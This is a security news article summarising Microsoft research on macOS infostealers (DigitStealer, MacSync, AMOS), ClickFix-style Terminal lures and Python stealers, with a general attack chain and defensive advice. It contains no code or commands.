Microsoft: macOS Infostealers Surge With ClickFix and Python

Microsoft Defender Experts published research this month warning that infostealer malware is aggressively expanding beyond Windows to target macOS environments. The campaigns use ClickFix-style social engineering, malicious DMG installers, and cross-platform Python stealers to harvest credentials, browser data, and cryptocurrency wallets from Apple users.

The shift matters because macOS has historically faced fewer commodity malware threats. That's changing fast.

The macOS Infostealer Landscape

Microsoft's analysis identifies several active malware families targeting Apple systems:

DigitStealer is a JavaScript for Automation (JXA)-based stealer first documented by Jamf Threat Labs in November 2025. It targets 18 cryptocurrency wallets, browser profiles, and macOS keychain data, with particular focus on Apple Silicon devices. Distribution occurs through disk images masquerading as legitimate utilities.

MacSync represents a more sophisticated threat that bypasses Gatekeeper protections through unsigned code loaded into trusted processes. The stealer harvests browser credentials, keychain entries, and cryptocurrency wallet files.

Atomic macOS Stealer (AMOS) continues operating as a malware-as-a-service offering. For $1,000/month, criminals get a turnkey solution for extracting passwords, cookies, and crypto assets from Mac victims. AMOS was behind multiple OpenClaw-related campaigns we've covered recently.

ClickFix Comes to macOS

The ClickFix technique—tricking users into executing malicious commands through fake error messages—has proven devastatingly effective against Windows users. Now it's adapted for macOS.

Microsoft observed campaigns where victims encounter fake verification prompts claiming camera or display configuration issues. The "solution" involves copying a command and pasting it into Terminal. Unlike Windows where PowerShell executes the payload, macOS victims run bash or Python scripts that install stealer components.

The approach works because macOS users aren't conditioned to distrust Terminal commands the way Windows users have (somewhat) learned to question PowerShell prompts. Apple's walled garden reputation creates false confidence that persists even when users manually execute malicious code.

Cross-Platform Python Stealers

A parallel trend involves Python-based stealers that run on any system with a Python interpreter. These tools often target developer machines—environments where Python is guaranteed to exist and where valuable credentials (API keys, cloud access tokens, source code) concentrate.

The Python stealers bypass platform-specific defenses by operating at the interpreter level. They're delivered through trojanized development tools, malicious pip packages, and supply chain compromises affecting npm and PyPI repositories.

Attack Chain Analysis

A typical macOS infostealer infection follows this pattern:

1. Initial lure - Victim downloads a DMG file advertised as cracked software, a utility, or a job-related coding test
2. Execution prompt - The DMG contains an application that requests Terminal execution or displays ClickFix-style prompts
3. Gatekeeper bypass - Various techniques suppress or circumvent Apple's code signing verification
4. In-memory execution - Malicious components load without touching disk, avoiding detection
5. Data harvesting - Stealer enumerates browser profiles, keychain entries, and cryptocurrency wallet paths
6. Exfiltration - Stolen data transmits to attacker C2 infrastructure

The infection chain exploits user trust rather than software vulnerabilities. Every step requires victim cooperation, but social engineering makes that cooperation routine.

Who's at Risk

Cryptocurrency holders face the highest risk. Every macOS stealer Microsoft analyzed prioritizes wallet extraction. Browser credentials rank second—valuable for account takeover but less immediately monetizable.

Developers represent a secondary target category. Their machines contain API tokens, cloud credentials, and access to source code repositories. A single compromised developer can cascade into organization-wide supply chain attacks.

Home users who believe "Macs don't get viruses" remain the softest targets. The myth persists despite years of evidence to the contrary, and attackers exploit this misconception through social engineering that wouldn't work against more security-aware populations.

Defensive Measures

Microsoft's research suggests practical mitigations:

1. Never paste commands from websites into Terminal - This is 2026's equivalent of enabling macros in Word documents
2. Verify DMG sources - Legitimate software comes from official sources, not download aggregators
3. Enable Gatekeeper strictly - Don't disable security features for "convenience"
4. Review browser extension permissions - Stealers often arrive through malicious browser extensions
5. Use hardware wallets - Keep significant cryptocurrency holdings off internet-connected devices

The broader lesson is that platform security doesn't protect against social engineering. macOS may have fewer remote exploits than Windows, but that advantage disappears when users willingly execute malicious code. As infostealers evolve to target AI agent configurations, the attack surface continues expanding regardless of operating system.